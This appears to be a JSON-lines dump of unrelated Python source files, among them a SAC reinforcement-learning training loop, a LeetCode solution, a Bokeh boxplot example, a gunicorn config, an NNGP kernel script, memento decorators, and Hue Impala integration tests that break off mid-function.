test_env.step(get_action(o, True))\n ep_ret += r\n ep_len += 1\n if args.test_render:\n test_env.render()\n ave_ep_ret = (j*ave_ep_ret + ep_ret)/(j+1)\n print('ep_len', ep_len, 'ep_ret:', ep_ret, 'ave_ep_ret:',ave_ep_ret,'({}/10000)'.format(j+1) )\n return\n\n\n ############################## train ############################\n\n def test_agent(n=25):\n global sess, mu, pi, q1, q2, q1_pi, q2_pi\n for j in range(n):\n o, r, d, ep_ret, ep_len = test_env.reset(), 0, False, 0, 0\n while not(d or (ep_len == max_ep_len_test)):\n # Take deterministic actions at test time \n o, r, d, _ = test_env.step(get_action(o, True))\n ep_ret += r\n ep_len += 1\n # test_env.render()\n logger.store(TestEpRet=ep_ret, TestEpLen=ep_len)\n\n start_time = time.time()\n o, r, d, ep_ret, ep_len = env.reset(), 0, False, 0, 0\n total_steps = steps_per_epoch * epochs\n\n ep_index = 0\n test_ep_ret_best = test_ep_ret = -10000.0\n\n # Main loop: collect experience in env and update/log each epoch\n for t in range(total_steps):\n\n \"\"\"\n Until start_steps have elapsed, randomly sample actions\n from a uniform distribution for better exploration. Afterwards, \n use the learned policy. 
\n \"\"\"\n if t > start_steps:\n a = get_action(o)\n else:\n a = env.action_space.sample()\n\n # Step the env\n o2, r, d, _ = env.step(a)\n ep_ret += r\n ep_len += 1\n\n # Ignore the \"done\" signal if it comes from hitting the time\n # horizon (that is, when it's an artificial terminal signal\n # that isn't based on the agent's state)\n # d = False if ep_len==max_ep_len_train else d\n\n # Store experience to replay buffer\n replay_buffer.store(o, a, r, o2, d)\n\n # Super critical, easy to overlook step: make sure to update \n # most recent observation!\n o = o2\n\n # End of episode. Training (ep_len times).\n if d or (ep_len == max_ep_len_train):\n ep_index += 1\n print('episode: {}, ep_len: {}, reward: {}'.format(ep_index, ep_len, ep_ret/reward_scale))\n \"\"\"\n Perform all SAC updates at the end of the trajectory.\n This is a slight difference from the SAC specified in the\n original paper.\n \"\"\"\n for j in range(int(1.5*ep_len)):\n batch = replay_buffer.sample_batch(batch_size)\n feed_dict = {x_ph: batch['obs1'],\n x2_ph: batch['obs2'],\n a_ph: batch['acts'],\n r_ph: batch['rews'],\n d_ph: batch['done'],\n }\n # step_ops = [pi_loss, q1_loss, q2_loss, q1, q2, logp_pi, alpha, train_pi_op, train_value_op, target_update]\n outs = sess.run(step_ops, feed_dict)\n logger.store(LossPi=outs[0], LossQ1=outs[1], LossQ2=outs[2],\n Q1Vals=outs[3], Q2Vals=outs[4],\n LogPi=outs[5], Alpha=outs[6])\n\n logger.store(EpRet=ep_ret/reward_scale, EpLen=ep_len)\n o, r, d, ep_ret, ep_len = env.reset(), 0, False, 0, 0\n\n\n # End of epoch wrap-up\n if t > 0 and t % steps_per_epoch == 0:\n epoch = t // steps_per_epoch\n\n test_agent(10)\n # test_ep_ret = logger.get_stats('TestEpRet')[0]\n # print('TestEpRet', test_ep_ret, 'Best:', test_ep_ret_best)\n if logger.get_stats('TestEpRet')[0] >= 180:\n print('Recalculating TestEpRet...')\n test_agent(100)\n test_ep_ret = logger.get_stats('TestEpRet')[0]\n # logger.epoch_dict['TestEpRet'] = []\n\n print('TestEpRet', test_ep_ret, 'Best:', test_ep_ret_best)\n\n # logger.store(): store the data; logger.log_tabular(): log the data; logger.dump_tabular(): write the data\n # Log info about epoch\n logger.log_tabular('Epoch', epoch)\n logger.log_tabular('Num_Ep', ep_index)\n logger.log_tabular('EpRet', with_min_and_max=True)\n logger.log_tabular('TestEpRet', with_min_and_max=False)\n logger.log_tabular('EpLen', average_only=True)\n logger.log_tabular('TestEpLen', average_only=True)\n logger.log_tabular('TotalEnvInteracts', t)\n logger.log_tabular('Alpha',average_only=True)\n logger.log_tabular('Q1Vals', with_min_and_max=True)\n logger.log_tabular('Q2Vals', with_min_and_max=True)\n # logger.log_tabular('VVals', with_min_and_max=True)\n logger.log_tabular('LogPi', with_min_and_max=True)\n logger.log_tabular('LossPi', average_only=True)\n logger.log_tabular('LossQ1', average_only=True)\n logger.log_tabular('LossQ2', average_only=True)\n # logger.log_tabular('LossV', average_only=True)\n logger.log_tabular('Time', time.time()-start_time)\n logger.dump_tabular()\n\n\n # Save model\n if ((epoch % save_freq == 0) or (epoch == epochs - 1)) and test_ep_ret > test_ep_ret_best:\n save_path = saver.save(sess, checkpoint_path+'/model.ckpt', t)\n print(\"Model saved in path: %s\" % save_path)\n test_ep_ret_best = test_ep_ret\n\n if test_ep_ret >= 200:\n print(\"Model saved in path: %s\" % save_path)\n\n print('\\nEnvironment solved in {:d} episodes!\\tAverage Score: {:.2f}'.format(ep_index, test_ep_ret))\n exit()\n\nif __name__ == '__main__':\n import argparse\n parser = 
argparse.ArgumentParser()\n parser.add_argument('--env', type=str, default='LunarLanderContinuous-v2') # 'Pendulum-v0'\n\n parser.add_argument('--is_restore_train', type=bool, default=False)\n\n parser.add_argument('--is_test', type=bool, default=False)\n parser.add_argument('--test_render', type=bool, default=False)\n\n parser.add_argument('--max_ep_len_test', type=int, default=2000) # 'BipedalWalkerHardcore-v2' max_ep_len is 2000\n parser.add_argument('--max_ep_len_train', type=int, default=1000) # max_ep_len_train < 2000//3 # 'BipedalWalkerHardcore-v2' max_ep_len is 2000\n parser.add_argument('--start_steps', type=int, default=100)\n parser.add_argument('--hid', type=int, default=300)\n parser.add_argument('--l', type=int, default=1)\n parser.add_argument('--gamma', type=float, default=0.99)\n parser.add_argument('--lr', type=float, default=1e-3)\n parser.add_argument('--seed', '-s', type=int, default=np.random.random_integers(1000))\n parser.add_argument('--epochs', type=int, default=10000)\n parser.add_argument('--alpha', default='auto', help=\"alpha can be either 'auto' or float(e.g:0.2).\")\n parser.add_argument('--reward_scale', type=float, default=1.0)\n parser.add_argument('--act_noise', type=float, default=0.3)\n parser.add_argument('--obs_noise', type=float, default=0.0)\n parser.add_argument('--exp_name', type=str, default='sac1_LunarLanderContinuous-v2_debug3')\n parser.add_argument('--stack_frames', type=int, default=4)\n args = parser.parse_args()\n\n from spinup.utils.run_utils import setup_logger_kwargs\n logger_kwargs = setup_logger_kwargs(args.exp_name, args.seed)\n\n\n\n class Wrapper(object):\n\n def __init__(self, env, action_repeat):\n self._env = env\n self.action_repeat = action_repeat\n\n def __getattr__(self, name):\n return getattr(self._env, name)\n\n def step(self, action):\n r = 0.0\n for _ in range(self.action_repeat):\n obs_, reward_, done_, info_ = self._env.step(action)\n reward_ = reward_ if reward_ > -99.0 else 0.0\n r = r + reward_\n if done_:\n return obs_, r, done_, info_\n return obs_, r, done_, info_\n\n\n # env = FrameStack(env, args.stack_frames)\n\n env_lunar1 = gym.make(args.env)\n env_lunar3 = Wrapper(gym.make(args.env),3)\n\n\n sac1(args, lambda n : env_lunar3 if n==3 else env_lunar1, actor_critic=core.mlp_actor_critic,\n ac_kwargs=dict(hidden_sizes=[200,150]), start_steps = args.start_steps,\n gamma=args.gamma, seed=args.seed, epochs=args.epochs, alpha=args.alpha,\n logger_kwargs=logger_kwargs, lr = args.lr, reward_scale=args.reward_scale,\n max_ep_len_train = args.max_ep_len_train, max_ep_len_test=args.max_ep_len_test)\n\n\n"} {"ext": "py", "sha": "1a2ecc6bad59824fa1f6ac55ea8fd73202781d3d", "content": "# -*- coding: utf-8 -*-\n\"\"\"\nhashing package.\n\"\"\"\n\nfrom pyrin.packaging.base import Package\n\n\nclass HashingPackage(Package):\n \"\"\"\n hashing package class.\n \"\"\"\n\n NAME = __name__\n DEPENDS = []\n COMPONENT_NAME = 'security.hashing.component'\n"} {"ext": "py", "sha": "1a2ecd7107a85cf463bbc690de50a35bcbc58805", "content": "\"\"\"1248. 
Count Number of Nice Subarrays\nMedium\"\"\"\n\nclass Solution(object):\n def numberOfSubarrays(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: int\n \"\"\"\n #########\n m = [0]*50001\n res = 0\n curr = 0\n m[0] = 1\n for i in range(len(nums)):\n curr += (nums[i]%2)\n if curr >= k:\n res += m[curr-k]\n m[curr] += 1\n\n return res\n\n\n #######\n return self.atMost(nums, k)-self.atMost(nums, k-1)\n def atMost(self, nums, k):\n res = 0\n count = 0\n left = 0\n right = 0\n while right < len(nums):\n n = nums[right]\n count += n%2\n while count >= k:\n c = nums[left]\n count -= c%2\n left += 1\n res += right - left + 1\n right += 1\n return res\n#################\n def atMost(k):\n res = 0\n left = 0\n for right in range(len(nums)):\n k -= nums[right]%2\n while k < 0:\n k += nums[left]%2\n left += 1\n res += right -left + 1\n\n return res\n\n return atMost(k) - atMost(k-1)\n\n\n\n\n\n\n\n\n\n\n#\n"} {"ext": "py", "sha": "1a2ecd80be15ea48380f7886225f68a675e972bf", "content": "import numpy as np\nimport pandas as pd\n\nfrom bokeh.plotting import figure, output_file, show\n\n# generate some synthetic time series for six different categories\ncats = list(\"abcdef\")\nyy = np.random.randn(2000)\ng = np.random.choice(cats, 2000)\nfor i, l in enumerate(cats):\n yy[g == l] += i // 2\ndf = pd.DataFrame(dict(score=yy, group=g))\n\n# find the quartiles and IQR for each category\ngroups = df.groupby('group')\nq1 = groups.quantile(q=0.25)\nq2 = groups.quantile(q=0.5)\nq3 = groups.quantile(q=0.75)\niqr = q3 - q1\nupper = q3 + 1.5*iqr\nlower = q1 - 1.5*iqr\n\n# find the outliers for each category\ndef outliers(group):\n cat = group.name\n return group[(group.score > upper.loc[cat]['score']) | (group.score < lower.loc[cat]['score'])]['score']\nout = groups.apply(outliers).dropna()\n\n# prepare outlier data for plotting, we need coordinates for every outlier.\nif not out.empty:\n outx = []\n outy = []\n for keys in out.index:\n outx.append(keys[0])\n outy.append(out.loc[keys[0]].loc[keys[1]])\n\np = figure(tools=\"\", background_fill_color=\"#efefef\", x_range=cats, toolbar_location=None)\n\n# if no outliers, shrink lengths of stems to be no longer than the minimums or maximums\nqmin = groups.quantile(q=0.00)\nqmax = groups.quantile(q=1.00)\nupper.score = [min([x,y]) for (x,y) in zip(list(qmax.loc[:,'score']),upper.score)]\nlower.score = [max([x,y]) for (x,y) in zip(list(qmin.loc[:,'score']),lower.score)]\n\n# stems\np.segment(cats, upper.score, cats, q3.score, line_color=\"black\")\np.segment(cats, lower.score, cats, q1.score, line_color=\"black\")\n\n# boxes\np.vbar(cats, 0.7, q2.score, q3.score, fill_color=\"#E08E79\", line_color=\"black\")\np.vbar(cats, 0.7, q1.score, q2.score, fill_color=\"#3B8686\", line_color=\"black\")\n\n# whiskers (almost-0 height rects simpler than segments)\np.rect(cats, lower.score, 0.2, 0.01, line_color=\"black\")\np.rect(cats, upper.score, 0.2, 0.01, line_color=\"black\")\n\n# outliers\nif not out.empty:\n p.circle(outx, outy, size=6, color=\"#F38630\", fill_alpha=0.6)\n\np.xgrid.grid_line_color = None\np.ygrid.grid_line_color = \"white\"\np.grid.grid_line_width = 2\np.xaxis.major_label_text_font_size=\"16px\"\n\noutput_file(\"boxplot.html\", title=\"boxplot.py example\")\n\nshow(p)\n"} {"ext": "py", "sha": "1a2ecd9f1d6d31168200762d078ed37afef0b3f4", "content": "#!/usr/bin/env python\n# coding=utf-8\n\"\"\"\n\n__created__ = '4/22/16'\n__author__ = 'deling.ma'\n\"\"\"\nimport multiprocessing\n\nbind = '0.0.0.0:7777'\nmax_requests = 10000\nkeepalive = 
5\n\nproc_name = 'fitahol'\n\nworkers = multiprocessing.cpu_count() * 2 + 1\nworker_class = 'gaiohttp'\n\nloglevel = 'info'\nerrorlog = '-'\n\nx_forwarded_for_header = 'X-FORWARDED-FOR'\n"} {"ext": "py", "sha": "1a2ece63ba632d7fd8e3f9695efe9d0224cde988", "content": "import numpy as np\nimport tensorflow as tf\nimport tensorflow.compat.v1.keras as keras\nimport pickle\nimport os\nfrom math import ceil\n\nfrom utils import preprocess_flags, save_kernel, save_kernel_partial\nfrom utils import load_data,load_model,load_model_json,load_kernel\nfrom utils import data_folder,kernel_folder,arch_folder\n\ndef main(_):\n\n FLAGS = tf.compat.v1.app.flags.FLAGS.flag_values_dict()\n FLAGS = preprocess_flags(FLAGS)\n globals().update(FLAGS)\n\n if init_dist != \"gaussian\":\n raise NotImplementedError(\"Initialization distributions other than Gaussian are not implemented for computing kernels!\")\n\n from mpi4py import MPI\n comm = MPI.COMM_WORLD\n rank = comm.Get_rank()\n size = comm.Get_size()\n print(rank)\n\n if n_gpus>0:\n os.environ[\"CUDA_VISIBLE_DEVICES\"]=str((rank)%n_gpus)\n config = tf.compat.v1.ConfigProto()\n config.gpu_options.allow_growth = True\n\n set_session = keras.backend.set_session\n config.log_device_placement = False # to log device placement (on which device the operation ran)\n config.allow_soft_placement = True # so that it uses any other existing and supported devices, if the requested GPU:0 isn't found\n sess = tf.compat.v1.Session(config=config)\n set_session(sess) # set this TensorFlow session as the default session for Keras\n\n train_images,flat_train_images,_,test_images,_ = load_data(FLAGS)\n image_size = train_images.shape[1]\n number_channels = train_images.shape[-1]\n #print(\"image_size\", image_size)\n X = train_images\n flat_X = flat_train_images\n if compute_for_GP_train:\n test_images = test_images[:1000]\n data = test_images\n tp_order = np.concatenate([[0,len(data.shape)-1], np.arange(1, len(data.shape)-1)])\n print(data.shape,tp_order)\n flat_data = np.transpose(data, tp_order) # NHWC -> NCHW # this is because the cnn GP kernels assume this\n flat_test_images = np.array([test_image.flatten() for test_image in flat_data])\n Xfull = np.concatenate([flat_train_images,flat_test_images])\n flat_X = Xfull\n X = np.concatenate([train_images,test_images])\n\n print(\"compute kernel\", network, dataset)\n\n # COMPUTE KERNEL\n if use_empirical_NTK:\n from nngp_kernel.empirical_ntk import empirical_NTK\n print(ceil(int(X.shape[0])*n_samples_repeats))\n from tensorflow.keras.models import model_from_json\n model = load_model(FLAGS)\n K = empirical_NTK(model,X)#,sess=sess)\n elif use_empirical_K:\n from nngp_kernel.empirical_kernel import empirical_K\n print(\"n_samples_repeats\",n_samples_repeats)\n print(ceil(int(X.shape[0])*n_samples_repeats))\n arch_json_string = load_model_json(FLAGS)\n K = empirical_K(arch_json_string,X,ceil(int(X.shape[0])*n_samples_repeats),sigmaw=sigmaw,sigmab=sigmab,n_gpus=n_gpus,empirical_kernel_batch_size=empirical_kernel_batch_size, sess=sess, truncated_init_dist=truncated_init_dist,data_parallelism=False,store_partial_kernel=store_partial_kernel,partial_kernel_n_proc=partial_kernel_n_proc,partial_kernel_index=partial_kernel_index)\n if rank == 0:\n if not (use_empirical_K or use_empirical_NTK):\n if network==\"cnn\":\n from nngp_kernel.cnn_kernel import kernel_matrix\n K = 
kernel_matrix(flat_X,image_size=image_size,number_channels=number_channels,filter_sizes=filter_sizes,padding=padding,strides=strides,sigmaw=sigmaw,sigmab=sigmab,n_gpus=n_gpus)\n\n elif network==\"resnet\":\n from nngp_kernel.resnet_kernel import kernel_matrix\n K = kernel_matrix(flat_X,depth=number_layers,image_size=image_size,number_channels=number_channels,n_blocks=3,sigmaw=sigmaw,sigmab=sigmab,n_gpus=n_gpus)\n\n elif network == \"fc\":\n from nngp_kernel.fc_kernel import kernel_matrix\n K = kernel_matrix(flat_X,number_layers=number_layers,sigmaw=sigmaw,sigmab=sigmab,n_gpus=n_gpus)\n\n print(K)\n\n '''SAVE KERNEL'''\n if store_partial_kernel:\n save_kernel_partial(K,FLAGS,partial_kernel_index) \n else:\n save_kernel(K,FLAGS)\n\n\nif __name__ == '__main__':\n\n f = tf.compat.v1.app.flags\n\n from utils import define_default_flags\n\n define_default_flags(f)\n f.DEFINE_boolean('compute_for_GP_train', False, \"Whether to add a bit of test set to kernel, to be able to use it for GP training\")\n f.DEFINE_boolean('store_partial_kernel', False, \"Whether to store the kernels partially on a file to free the processes\")\n f.DEFINE_integer('empirical_kernel_batch_size', 256, \"batch size to use when computing the empirical kernel, larger models need smaller values, but smaller models can use larger values\")\n f.DEFINE_integer('partial_kernel_n_proc', 175, \"number of processes over which we are parallelizing the when computing partial kernels and saving\")\n f.DEFINE_integer('partial_kernel_index', 0, \"index of the process when using partial_kernels method\")\n\n tf.compat.v1.app.run()\n"} {"ext": "py", "sha": "1a2eceda5f4aee7b68d75c4aa2f4346d9be6b522", "content": "\"\"\"\nThis namespace holds Inference decorators.\n\"\"\"\nfrom .inference import Inference\n\n\n# --------------------------------------------------------------------------\ndef get(label):\n \"\"\"\n This is an inference decorator which can be used to decorate\n a getter method.\n\n ..code-block:: python\n \n >>> import recollection\n >>>\n >>> class Foo(recollection.Inference):\n ... \n ... def __init__(self):\n ... super(Foo, self).__init__()\n ... \n ... # -- Demonstrate a private attribute with getter\n ... # -- and setter methods\n ... self._letter = 1\n ... \n ... # -- Declare that this is a memento getter\n ... @recollection.infer.get('foobar')\n ... def get_letter(self):\n ... return self._letter\n\n :param label: You must specify a label to be used when storing\n this variable. For the registration to be processed there \n must be a correlating setter defined on the class with the same\n label.\n :type label: str\n\n :return: \n \"\"\"\n def inner_decor(func):\n def inner(*args, **kwargs):\n return func(*args, **kwargs)\n\n # -- Assign our attributes\n inner.label = label\n inner.is_memento_getter = True\n inner.is_memento_setter = False\n\n return inner\n\n return inner_decor\n\n\n# --------------------------------------------------------------------------\ndef store(label, copy_value=True, serialise=False):\n \"\"\"\n This is an inference decorator which can be used to decorate\n a getter method.\n\n ..code-block:: python\n \n >>> import recollection\n >>> \n >>> class Foo(recollection.Inference):\n ... \n ... def __init__(self):\n ... super(Foo, self).__init__()\n ... \n ... # -- Demonstrate a private attribute with getter\n ... # -- and setter methods\n ... self._letter = 1\n ... \n ... # -- Declare that this is a memento getter\n ... @recollection.infer.store('letter', serialise=True)\n ... 
def set_letter(self):\n ... return self._letter\n >>> foo = Foo()\n \n :param label: You must specify a label to be used when storing\n this variable. For the registration to be processed there \n must be a correlating setter defined on the class with the same\n label.\n :type label: str\n\n :param copy_value: Default is True, this defines whether the object\n being stored will be copied or referenced. Typically if this is\n likely to be left to True, however if you want a reference to an \n object to be stored in history rather than copies of the object you\n should set this to False.\n :type copy_value: bool\n\n :param serialise: If true this will perform a serialisation of the \n memento object each time the setter is called. This expects a\n serialiser to be registered. The default is False.\n :type serialise: bool\n\n :return: \n \"\"\"\n\n def inner_decor(func):\n def inner(*args, **kwargs):\n result = func(*args, **kwargs)\n\n # -- Now store\n if isinstance(args[0], Inference):\n args[0].memento.store(serialise=serialise)\n\n return result\n\n # -- Assign our attributes\n inner.label = label\n inner.is_memento_getter = False\n inner.is_memento_setter = True\n inner.copy_value = copy_value\n\n return inner\n\n return inner_decor\n"} {"ext": "py", "sha": "1a2ed04be8d0202c2b5d6919530f398ef3156a94", "content": "#!/usr/bin/env python\n# Licensed to Cloudera, Inc. under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. Cloudera, Inc. licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport logging\nimport re\n\nfrom nose.plugins.skip import SkipTest\nfrom nose.tools import assert_true, assert_equal, assert_false\n\nfrom django.contrib.auth.models import User\nfrom django.urls import reverse\n\nimport desktop.conf as desktop_conf\nfrom desktop.lib.django_test_util import make_logged_in_client\nfrom desktop.lib.test_utils import add_to_group\nfrom desktop.models import Document\nfrom hadoop.pseudo_hdfs4 import get_db_prefix, is_live_cluster\n\nfrom beeswax import data_export\nfrom beeswax.design import hql_query\n\nfrom beeswax.data_export import download\nfrom beeswax.models import SavedQuery, QueryHistory\nfrom beeswax.server import dbms\nfrom beeswax.test_base import get_query_server_config, wait_for_query_to_finish, fetch_query_result_data\nfrom beeswax.tests import _make_query\n\nfrom impala import conf\nfrom impala.dbms import ImpalaDbms\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass MockDbms:\n\n def get_databases(self):\n return ['db1', 'db2']\n\n def get_tables(self, database):\n return ['table1', 'table2']\n\n\nclass TestMockedImpala:\n\n def setUp(self):\n self.client = make_logged_in_client()\n\n # Mock DB calls as we don't need the real ones\n self.prev_dbms = dbms.get\n dbms.get = lambda a, b: MockDbms()\n\n def tearDown(self):\n # Remove monkey patching\n dbms.get = self.prev_dbms\n\n def test_basic_flow(self):\n response = 
self.client.get(\"/impala/\")\n assert_true(re.search('Impala', response.content), response.content)\n assert_true('Query Editor' in response.content)\n\n response = self.client.get(\"/impala/execute/\")\n assert_true('Query Editor' in response.content)\n\n def test_saved_queries(self):\n user = User.objects.get(username='test')\n\n response = self.client.get(\"/impala/list_designs\")\n assert_equal(len(response.context[0]['page'].object_list), 0)\n\n try:\n beewax_query = create_saved_query('beeswax', user)\n response = self.client.get(\"/impala/list_designs\")\n assert_equal(len(response.context[0]['page'].object_list), 0)\n\n impala_query = create_saved_query('impala', user)\n response = self.client.get(\"/impala/list_designs\")\n assert_equal(len(response.context[0]['page'].object_list), 1)\n\n # Test my query page\n QueryHistory.objects.create(owner=user, design=impala_query, query='', last_state=QueryHistory.STATE.available.value)\n\n resp = self.client.get('/impala/my_queries')\n assert_equal(len(resp.context[0]['q_page'].object_list), 1)\n assert_equal(resp.context[0]['h_page'].object_list[0].design.name, 'create_saved_query')\n finally:\n if beewax_query is not None:\n beewax_query.delete()\n if impala_query is not None:\n impala_query.delete()\n\n\nclass TestImpalaIntegration:\n\n @classmethod\n def setup_class(cls):\n cls.finish = []\n\n if not is_live_cluster():\n raise SkipTest\n\n cls.client = make_logged_in_client()\n cls.user = User.objects.get(username='test')\n add_to_group('test')\n cls.db = dbms.get(cls.user, get_query_server_config(name='impala'))\n cls.DATABASE = get_db_prefix(name='impala')\n\n queries = [\"\"\"\n DROP TABLE IF EXISTS %(db)s.tweets;\n \"\"\" % {'db': cls.DATABASE}, \"\"\"\n DROP DATABASE IF EXISTS %(db)s CASCADE;\n \"\"\" % {'db': cls.DATABASE}, \"\"\"\n CREATE DATABASE %(db)s;\n \"\"\" % {'db': cls.DATABASE}]\n\n for query in queries:\n resp = _make_query(cls.client, query, database='default', local=False, server_name='impala')\n resp = wait_for_query_to_finish(cls.client, resp, max=180.0)\n content = json.loads(resp.content)\n assert_true(content['status'] == 0, resp.content)\n\n queries = [\"\"\"\n CREATE TABLE tweets (row_num INTEGER, id_str STRING, text STRING) STORED AS PARQUET;\n \"\"\", \"\"\"\n INSERT INTO TABLE tweets VALUES (1, \"531091827395682000\", \"My dad looks younger than costa\");\n \"\"\", \"\"\"\n INSERT INTO TABLE tweets VALUES (2, \"531091827781550000\", \"There is a thin line between your partner being vengeful and you reaping the consequences of your bad actions towards your partner.\");\n \"\"\", \"\"\"\n INSERT INTO TABLE tweets VALUES (3, \"531091827768979000\", \"@Mustang_Sally83 and they need to get into you :))))\");\n \"\"\", \"\"\"\n INSERT INTO TABLE tweets VALUES (4, \"531091827114668000\", \"@RachelZJohnson thank you rach!xxx\");\n \"\"\", \"\"\"\n INSERT INTO TABLE tweets VALUES (5, \"531091827949309000\", \"i think @WWERollins was robbed of the IC title match this week on RAW also i wonder if he will get a rematch i hope so @WWE\");\n \"\"\"]\n\n for query in queries:\n resp = _make_query(cls.client, query, database=cls.DATABASE, local=False, server_name='impala')\n resp = wait_for_query_to_finish(cls.client, resp, max=180.0)\n content = json.loads(resp.content)\n assert_true(content['status'] == 0, resp.content)\n\n\n @classmethod\n def teardown_class(cls):\n # We need to drop tables before dropping the database\n queries = [\"\"\"\n DROP TABLE IF EXISTS %(db)s.tweets;\n \"\"\" % {'db': cls.DATABASE}, \"\"\"\n 
DROP DATABASE %(db)s CASCADE;\n \"\"\" % {'db': cls.DATABASE}]\n for query in queries:\n resp = _make_query(cls.client, query, database='default', local=False, server_name='impala')\n resp = wait_for_query_to_finish(cls.client, resp, max=180.0)\n\n # Check the cleanup\n databases = cls.db.get_databases()\n assert_false(cls.DATABASE in databases)\n assert_false('%(db)s_other' % {'db': cls.DATABASE} in databases)\n\n for f in cls.finish:\n f()\n\n\n def test_basic_flow(self):\n dbs = self.db.get_databases()\n assert_true('_impala_builtins' in dbs, dbs)\n assert_true(self.DATABASE in dbs, dbs)\n\n tables = self.db.get_tables(database=self.DATABASE)\n assert_true('tweets' in tables, tables)\n\n QUERY = \"\"\"\n SELECT * FROM tweets ORDER BY row_num;\n \"\"\"\n response = _make_query(self.client, QUERY, database=self.DATABASE, local=False, server_name='impala')\n content = json.loads(response.content)\n query_history = QueryHistory.get(content['id'])\n\n response = wait_for_query_to_finish(self.client, response, max=180.0)\n\n results = []\n\n # Check that we multiple fetches get all the result set\n while len(results) < 5:\n content = fetch_query_result_data(self.client, response, n=len(results), server_name='impala') # We get less than 5 results most of the time, so increase offset\n results += content['results']\n\n assert_equal([1, 2, 3, 4, 5], [col[0] for col in results])\n\n # Check start over\n results_start_over = []\n\n while len(results_start_over) < 5:\n content = fetch_query_result_data(self.client, response, n=len(results_start_over), server_name='impala')\n results_start_over += content['results']\n\n assert_equal(results_start_over, results)\n\n # Check cancel query\n resp = self.client.post(reverse('impala:api_cancel_query', kwargs={'query_history_id': query_history.id}))\n content = json.loads(resp.content)\n assert_equal(0, content['status'])\n\n\n def test_data_download(self):\n hql = 'SELECT * FROM tweets %(limit)s'\n\n FETCH_SIZE = data_export.FETCH_SIZE\n data_export.FETCH_SIZE = 2 # Decrease fetch size to validate last fetch logic\n\n try:\n query = hql_query(hql % {'limit': ''})\n\n handle = self.db.execute_and_wait(query)\n # Get the result in csv. 
Should have 5 + 1 header row.\n csv_resp = download(handle, 'csv', self.db)\n csv_content = ''.join(csv_resp.streaming_content)\n assert_equal(len(csv_content.strip().split('\\n')), 5 + 1)\n\n\n query = hql_query(hql % {'limit': 'LIMIT 0'})\n\n handle = self.db.execute_and_wait(query)\n csv_resp = download(handle, 'csv', self.db)\n csv_content = ''.join(csv_resp.streaming_content)\n assert_equal(len(csv_content.strip().split('\\n')), 1)\n\n query = hql_query(hql % {'limit': 'LIMIT 1'})\n\n handle = self.db.execute_and_wait(query)\n csv_resp = download(handle, 'csv', self.db)\n csv_content = ''.join(csv_resp.streaming_content)\n assert_equal(len(csv_content.strip().split('\\n')), 1 + 1)\n\n query = hql_query(hql % {'limit': 'LIMIT 2'})\n\n handle = self.db.execute_and_wait(query)\n csv_resp = download(handle, 'csv', self.db)\n csv_content = ''.join(csv_resp.streaming_content)\n assert_equal(len(csv_content.strip().split('\\n')), 1 + 2)\n finally:\n data_export.FETCH_SIZE = FETCH_SIZE\n\n\n def test_explain(self):\n QUERY = \"\"\"\n SELECT * FROM tweets ORDER BY row_num;\n \"\"\"\n response = _make_query(self.client, QUERY, database=self.DATABASE, local=False, server_name='impala', submission_type='Explain')\n json_response = json.loads(response.content)\n assert_true('MERGING-EXCHANGE' in json_response['explanation'], json_response)\n assert_true('SCAN HDFS' in json_response['explanation'], json_response)\n\n\n def test_get_table_sample(self):\n client = make_logged_in_client()\n\n resp = client.get(reverse('impala:get_sample_data', kwargs={'database': self.DATABASE, 'table': 'tweets'}))\n data = json.loads(resp.content)\n assert_equal(0, data['status'], data)\n assert_equal([u'row_num', u'id_str', u'text'], data['headers'], data)\n assert_true(len(data['rows']), data)\n\n\n def test_get_session(self):\n session = None\n try:\n # Create open session\n session = self.db.open_session(self.user)\n\n resp = self.client.get(reverse(\"impala:api_get_session\"))\n data = json.loads(resp.content)\n assert_true('properties' in data)\n assert_true(data['properties'].get('http_addr'))\n assert_true('session' in data, data)\n assert_true('id' in data['session'], data['session'])\n finally:\n if session is not None:\n try:\n self.db.close_session(session)\n except Exception:\n pass\n\n\n def test_get_settings(self):\n resp = self.client.get(reverse(\"impala:get_settings\"))\n json_resp = json.loads(resp.content)\n assert_equal(0, json_resp['status'])\n assert_true('QUERY_TIMEOUT_S' in json_resp['settings'])\n\n\n def test_invalidate_tables(self):\n # Helper function to get Impala and Beeswax (HMS) tables\n def get_impala_beeswax_tables():\n impala_resp = self.client.get(reverse('impala:api_autocomplete_tables', kwargs={'database': self.DATABASE}))\n impala_tables_meta = json.loads(impala_resp.content)['tables_meta']\n impala_tables = [table['name'] for table in impala_tables_meta]\n beeswax_resp = self.client.get(reverse('beeswax:api_autocomplete_tables', kwargs={'database': self.DATABASE}))\n beeswax_tables_meta = json.loads(beeswax_resp.content)['tables_meta']\n beeswax_tables = [table['name'] for table in beeswax_tables_meta]\n return impala_tables, beeswax_tables\n\n impala_tables, beeswax_tables = get_impala_beeswax_tables()\n assert_equal(impala_tables, beeswax_tables,\n \"\\ntest_invalidate_tables: `%s`\\nImpala Tables: %s\\nBeeswax Tables: %s\" % (self.DATABASE, ','.join(impala_tables), ','.join(beeswax_tables)))\n\n hql = \"\"\"\n CREATE TABLE new_table (a INT);\n \"\"\"\n resp = 
_make_query(self.client, hql, wait=True, local=False, max=180.0, database=self.DATABASE)\n\n impala_tables, beeswax_tables = get_impala_beeswax_tables()\n # New table is not found by Impala\n assert_true('new_table' in beeswax_tables, beeswax_tables)\n assert_false('new_table' in impala_tables, impala_tables)\n\n resp = self.client.post(reverse('impala:invalidate'), {'database': self.DATABASE})\n\n impala_tables, beeswax_tables = get_impala_beeswax_tables()\n # Invalidate picks up new table\n assert_equal(impala_tables, beeswax_tables,\n \"\\ntest_invalidate_tables: `%s`\\nImpala Tables: %s\\nBeeswax Tables: %s\" % (self.DATABASE, ','.join(impala_tables), ','.join(beeswax_tables)))\n\n\n def test_refresh_table(self):\n # Helper function to get Impala and Beeswax (HMS) columns\n def get_impala_beeswax_columns():\n impala_resp = self.client.get(reverse('impala:api_autocomplete_columns', kwargs={'database': self.DATABASE, 'table': 'tweets'}))\n impala_columns = json.loads(impala_resp.content)['columns']\n 